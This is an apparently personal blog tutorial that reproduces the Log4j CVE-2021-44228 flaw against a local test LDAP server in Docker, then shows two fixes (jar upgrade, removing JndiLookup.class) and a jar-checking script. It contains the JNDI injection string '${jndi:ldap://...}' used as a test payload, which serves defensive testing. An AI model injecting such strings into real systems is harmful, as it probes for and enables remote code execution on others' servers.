How to reproduce CVE-2021-44228 (Log4J vulnerability), patch it, and validate the fix
Ethical Hacking: I am explaining this so that more people can understand what's going on and protect themselves.
Please do not harm others.
I thought of working on it last night, but I had three important events.
- There was a Christmas party, and my kids brought me there.
- The party was over at 8 PM, but Johan and I practiced piano notes for “Believer”. Since Johan has classes today, he went to bed after the practice, at 9:30.
- But Jadon wanted me to read books and tell him stories. After reading 5 books and more than 10 stories, he finally slept. It was 12:30 when Jadon and I slept.
I woke up to a nightmare at 4 and could not go back to sleep. Then I did some video editing and published my kids' Turtleback Zoo video on YouTube.
Finally, I had some time and started working on this.
In this article I discuss how to reproduce CVE-2021-44228 (the Log4j vulnerability), patch it, and validate the fix.
I was crafting my own JNDI LDAP server, and I had the JNDI server ready. The next bit was integrating it with an LDAP server. So I set up OpenLDAP and was about to configure it. This was the first time I had set up an LDAP server, and I realized I was wading through the OpenLDAP docs. So I ran a Google search and found a nice LDAP server, specifically crafted to test this vulnerability, and it simplified my work.
Acknowledgments:
- A minimalistic LDAP server that is meant for testing vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228 (golangexample.com)
- rakutentech/jndi-ldap-test-server: A minimalistic LDAP server that is meant for testing vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228 (github.com)
- A deep dive into a real-life Log4j exploitation – Check Point Software
- us-16-MunozMirosh-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE (blackhat.com)
LDAP Server: Standalone
The test LDAP server can be run as a Docker container; it listens on port 1389:
docker run -i -p 1389:1389 vivasaayi/jndi-ldap-test-server:0.0.1
The test LDAP server has an endpoint that returns a marker string (the "!!! VULNERABLE !!!" seen in the output below) whenever a JNDI lookup reaches it.
Precheck: Check if you have vulnerable Log4j jars.
You can use the code below to check whether the Log4j jars on your classpath are vulnerable.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4JExploit {
    static Logger logger = LogManager.getLogger(Log4JExploit.class);

    public static void main(String... args) {
        // A harmless lookup: a vulnerable Log4j resolves it to the running JVM version.
        String javaVersion = "${java:version}";
        // The JNDI lookup: a vulnerable Log4j contacts the test LDAP server on localhost:1389.
        String ldapUrl = "${jndi:ldap://localhost:1389/Test}";

        // System.out prints the literal string; only the logger performs the lookups.
        System.out.println(javaVersion);
        logger.error(javaVersion);
        logger.error(ldapUrl);
        System.out.println("Exiting.");
    }
}
Run that code
# Update the directory locations accordingly
javac -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar /repo/src/Log4JExploit.java
java -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar:/repo/src Log4JExploit
It will print output like this:
${java:version}
11:24:37.666 [main] ERROR Log4JExploit - Java version 1.8.0_312
11:24:37.669 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
Exiting.
Process finished with exit code 0
Simple command to check the vulnerability
You can build and run the above two steps with the Docker Compose setup in this repository:
git clone https://github.com/vivasaayi/log4jexploit.git
cd log4jexploit
make build
make run
This is the output:
(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Starting log4jexploit_ldapserver_1 ... done
Recreating log4jexploit_localpow_1 ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1 | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:29:51Z","message":"Listening on 0.0.0.0:1389"}
localpow_1 | ${java:version}
localpow_1 | 16:29:52.886 [main] ERROR Log4JExploit - Java version 1.8.0_312
ldapserver_1 | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"bind","auth_type":"simple","user":""},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Bind Request"}
ldapserver_1 | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"search","base_dn":"Test","filter":"(objectClass=*)","attributes":[],"time_limit":0},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Search Request"}
localpow_1 | 16:29:52.890 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
localpow_1 | Exiting.
Fix 1: Update the jars
I updated the jars (log4j-api-2.16.0.jar); they can be found in this folder: vivasaayi/log4jexploit at updated-log4j-versions (github.com)
Please download the official Log4j patch release for your production use.
To validate the fix, run:
docker-compose down
git checkout updated-log4j-versions
git pull
make build
make run
Now you will not see the vulnerability: neither lookup is resolved, and both log lines contain the literal ${...} strings.
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1 | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:34:08Z","message":"Listening on 0.0.0.0:1389"}
localpow_1 | ${java:version}
localpow_1 | 16:34:09.866 [main] ERROR Log4JExploit - ${java:version}
localpow_1 | 16:34:09.869 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1 | Exiting.
log4jexploit_localpow_1 exited with code 0
Fix 2: Remove the JNDI lookup class
This is in this branch: log4jexploit/libs at repack-log4j · vivasaayi/log4jexploit (github.com)
This is the script that patches the old Log4j jars (I have already run it in that branch):
cd libs
echo "Patching log4j-core-*.."
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
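The precheck above asks whether a Log4j jar is vulnerable, and Fix 2 changes a jar's contents without changing its version. The following added example (mine, not code from the article or the log4jexploit repository) inspects a log4j-core jar directly: it reads the version from the Maven pom.properties entry and checks whether JndiLookup.class is still present, so it tells apart an updated jar (Fix 1), a repacked one (Fix 2), and an untouched vulnerable one. The 2.16.0 threshold is the article's update target, and the sample jars are constructed in memory with only the entries the check reads.

```python
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Update target used by the article's Fix 1 (adjust to the current official advisory).
FIXED_VERSION = (2, 16, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0): trailing qualifiers are dropped."""
    parts = []
    for piece in text.split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def inspect_log4j_core(jar_bytes):
    """Return (version or None, JndiLookup.class present?) for a log4j-core jar."""
    version = None
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_LOOKUP_CLASS in names


def assess(jar_bytes):
    """Classify a jar as the article's two fixes would leave it."""
    version, has_jndi = inspect_log4j_core(jar_bytes)
    if not has_jndi:
        return "mitigated: JndiLookup.class removed (Fix 2)"
    if version is not None and parse_version(version) >= FIXED_VERSION:
        return f"patched: log4j-core {version} (Fix 1)"
    return f"VULNERABLE: log4j-core {version or 'unknown'} still ships JndiLookup.class"


def make_test_jar(version, include_jndi_lookup):
    """Constructed stand-in for a real jar: only the entries the check looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


if __name__ == "__main__":
    for ver, jndi in (("2.14.1", True), ("2.16.0", True), ("2.14.1", False)):
        print(ver, "jndi" if jndi else "no-jndi", "->", assess(make_test_jar(ver, jndi)))
```

To check a real jar, pass `open("log4j-core-2.14.1.jar", "rb").read()` to `assess`.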
To validate, run the steps below. Note the difference from Fix 1: ${java:version} is still resolved (only the JNDI lookup class was removed, other lookups remain enabled), while the ${jndi:...} string is now logged literally.
docker-compose down
git checkout repack-log4j
git pull
make build
make run
(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Creating network "log4jexploit_default" with the default driver
Creating log4jexploit_ldapserver_1 ... done
Creating log4jexploit_localpow_1 ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1 | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:37:15Z","message":"Listening on 0.0.0.0:1389"}
localpow_1 | ${java:version}
localpow_1 | 16:37:16.797 [main] ERROR Log4JExploit - Java version 1.8.0_312
localpow_1 | 16:37:16.801 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1 | Exiting.
log4jexploit_localpow_1 exited with code 0
Final Notes:
If you are on AWS, there are other patches available. I will continue to work on them and provide updates on my blog.